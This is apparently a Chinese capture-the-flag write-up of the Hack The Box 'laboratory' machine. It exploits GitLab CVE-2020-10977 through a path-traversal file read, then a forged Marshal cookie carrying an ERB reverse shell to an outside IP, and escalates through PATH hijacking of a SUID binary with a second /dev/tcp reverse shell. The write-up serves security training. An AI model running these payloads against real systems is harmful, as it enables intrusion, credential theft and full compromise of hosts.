其他分享
首页 > 其他分享> > Hack The Box - laboratory(CVE-2020-10977)

Hack The Box - laboratory(CVE-2020-10977)

作者:互联网

image

laboratory

#0 Nmap 收集信息

nmap 10.10.10.26 -p-
根据Nmap的综合扫描来看,有两个域名laboratory.htb和git.laboratory.htb。

─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:34 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0054s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 104.39 seconds
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p22,80,443 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:38 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0026s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

在laboratory.htb翻找一番并未发现有利用的东西。常规操作扫目录、查看页面信息都没收获。
唯一有价值就是三个“用户名”

 

#1 漏洞利用 CVE-2020-10977(LFI)

接着就是到git.laboratory.htb,打开发现是gitlab服务

到attackerkb上搜索公开漏洞,发现有个LFI-RCE,漏洞编号CVE-2020-10977;

注册账号后根据漏洞复现文章进行漏洞复现,创建两个Projects
参考:https://www.freesion.com/article/17771419587/

再其中一个issues中加入payload

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

移动到另外一个Projects中

成功获得目标机器的secrets.yml,获取secret_key_base

攻击机上安装gitlab,安装步骤可按照上面的参考。
安装完依次输入两条命令启动gitlab。(需要些时间)
gitlab-ctl reconfigure
gitlab-ctl restart

将secrets.yml替换到攻击机的/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
sudo cp secrets.yml /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

#2 漏洞利用 CVE-2020-10977(RCE)

替换完后启动
gitlab-rails console
执行以下命令,主要修改ip和port

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >&/dev/tcp/10.10.14.33/8888 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

获得cookie后将cookie复制到curl中

curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIGZsYWcgd2FzIGhlcmUgPiAvdG1wL2ZsYWdgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--cb4149c7d5749262ab9d2f2072628501ab59ef9b" -k

攻击机起监听后,发送curl请求,将shell弹回到攻击机上

#3 USER Flag

接着在攻击机上启用gitlab-rails console
寻找其他用户

user = User.find(1) 
user.password = 'password1' 
user.password_confirmation = 'password1' 
user.save

找到dexter用户,他是公司的CEO。
结果显示为true表示修改成功。

gitlab登录到该用户找下是否有可利用的线索。
找到一个id_rsa私钥直接将私钥复制下来。

利用私钥进行登录,权限要设置成600
chmod 600 id_rsa
成功获得user的flag

#4 ROOT Flag

查看有SUID权限的文件
find -perm -4000 2>/dev/null
这里有个docker-security 比较可疑,直接查看一下,隐约能看到执行了两次chmod命令
我们可以使用环境变量提权
参考:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

创建个chmod,修改环境变量。

dexter@laboratory:~$ nano /tmp/chmod
dexter@laboratory:~$ cat /tmp/chmod 
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.33/33333 0>&1
dexter@laboratory:~$ chmod +x /tmp/chmod 
dexter@laboratory:~$ PATH=/tmp:$PATH docker-security

攻击机开启监听,成功弹回shell。获得root flag
收工!

参考链接:

CVE-2020-10977复现

环境变量提权

标签:Box,htb,..,10977,gitlab,tcp,2020,10.10,laboratory
来源: https://blog.csdn.net/qq_44101248/article/details/115755306